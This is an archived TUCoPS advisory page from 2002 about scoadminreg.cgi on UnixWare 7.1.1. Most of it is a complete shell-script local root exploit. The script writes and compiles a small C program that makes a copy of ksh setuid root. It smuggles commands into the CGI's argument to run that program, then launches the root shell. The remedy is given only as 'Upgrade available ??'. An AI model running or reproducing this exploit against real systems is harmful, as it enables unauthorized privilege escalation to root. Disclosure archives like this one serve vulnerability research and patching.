Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: web5021.htm

scoadminreg.cgi local root exploit



23th Jan 2002 [SBWID-5021]
COMMAND

	scoadminreg.cgi local root exploit

SYSTEMS AFFECTED

	Unixware 7.1.1

PROBLEM

	jGgM posted [http://www.netemperor.com/] :
	

	see exploit below
	

	 Exploit :

	 =========

	

	#!/bin/sh

	

	CC=\"gcc\"

	SCOADMIN=/opt/webtop/bin/i3un0212/cgi-

	bin/admin/scoadminreg.cgi

	

	#

	#

	#

	#

	

	echo

	echo \"jGgM root exploit\"

	echo \"http://www.netemperor.com/\"

	echo

	echo \"Mail: jggm@mail.com\"

	echo

	

	if [ ! -x $SCOADMIN ]; then

	   echo \"$SCOADMIN file not found\"

	   exit 2;

	fi

	

	cat >/tmp/jggm.c <<_EOF

	

	main()

	{

	   setuid(0);

	   setgid(0);

	   chown(\"/tmp/jGgM_Shell\", 0, 0);

	   chmod(\"/tmp/jGgM_Shell\", 04755);

	}

	_EOF

	

	cp /bin/ksh /tmp/jGgM_Shell

	$CC -o /tmp/jggm /tmp/jggm.c

	

	$SCOADMIN \"-c /tmp/jggm;/tmp/jggm;\"

	

	rm -rf /tmp/jggm /tmp/jggm.c

	

	/tmp/jGgM_Shell

	

	# end of file..

	

SOLUTION

	Upgrade available ??


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH